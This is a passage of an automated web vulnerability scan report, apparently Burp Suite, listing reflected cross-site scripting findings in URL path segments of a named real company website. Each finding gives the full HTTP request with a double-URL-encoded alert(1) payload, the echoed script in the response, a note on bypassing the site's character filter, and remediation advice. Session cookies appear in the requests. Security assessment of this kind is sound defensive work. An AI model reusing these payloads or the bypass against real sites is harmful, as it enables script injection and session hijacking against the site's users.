Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:46 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc3998f";alert(1)//fed13c53a9e/medialib/life-science/yfg-detail-page-jpg/yfg-go-new","E404") ;
   </script>
...[SNIP]...

1.404. http://www.sigmaaldrich.com/etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20aff%2522%253balert%25281%2529%252f%252fd5019ee4549 was submitted in the REST URL parameter 2. This input was echoed as 20aff";alert(1)//d5019ee4549 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib20aff%2522%253balert%25281%2529%252f%252fd5019ee4549/life-science/yfg-detail-page-jpg/yfg-go-new HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:48 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib20aff";alert(1)//d5019ee4549/life-science/yfg-detail-page-jpg/yfg-go-new","E404") ;
   </script>
...[SNIP]...

1.405. http://www.sigmaaldrich.com/etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71067%2522%253balert%25281%2529%252f%252ff0ecb1fa8d was submitted in the REST URL parameter 3. This input was echoed as 71067";alert(1)//f0ecb1fa8d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/life-science71067%2522%253balert%25281%2529%252f%252ff0ecb1fa8d/yfg-detail-page-jpg/yfg-go-new HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:50 GMT
Content-Length: 28959
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/life-science71067";alert(1)//f0ecb1fa8d/yfg-detail-page-jpg/yfg-go-new","E404") ;
   </script>
...[SNIP]...

1.406. http://www.sigmaaldrich.com/etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25f1d%2522%253balert%25281%2529%252f%252fe05caf466f4 was submitted in the REST URL parameter 4. This input was echoed as 25f1d";alert(1)//e05caf466f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/life-science/yfg-detail-page-jpg25f1d%2522%253balert%25281%2529%252f%252fe05caf466f4/yfg-go-new HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:54 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/life-science/yfg-detail-page-jpg25f1d";alert(1)//e05caf466f4/yfg-go-new","E404") ;
   </script>
...[SNIP]...

1.407. http://www.sigmaaldrich.com/etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-new

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e11a9%2522%253balert%25281%2529%252f%252f1ccf2ab8e8e was submitted in the REST URL parameter 5. This input was echoed as e11a9";alert(1)//1ccf2ab8e8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-newe11a9%2522%253balert%25281%2529%252f%252f1ccf2ab8e8e HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:00 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/life-science/yfg-detail-page-jpg/yfg-go-newe11a9";alert(1)//1ccf2ab8e8e","E404") ;
   </script>
...[SNIP]...

1.408. http://www.sigmaaldrich.com/etc/medialib/logos/center-graphics/services [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/logos/center-graphics/services

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a310%2522%253balert%25281%2529%252f%252ff26cf6c70bc was submitted in the REST URL parameter 1. This input was echoed as 6a310";alert(1)//f26cf6c70bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc6a310%2522%253balert%25281%2529%252f%252ff26cf6c70bc/medialib/logos/center-graphics/services HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
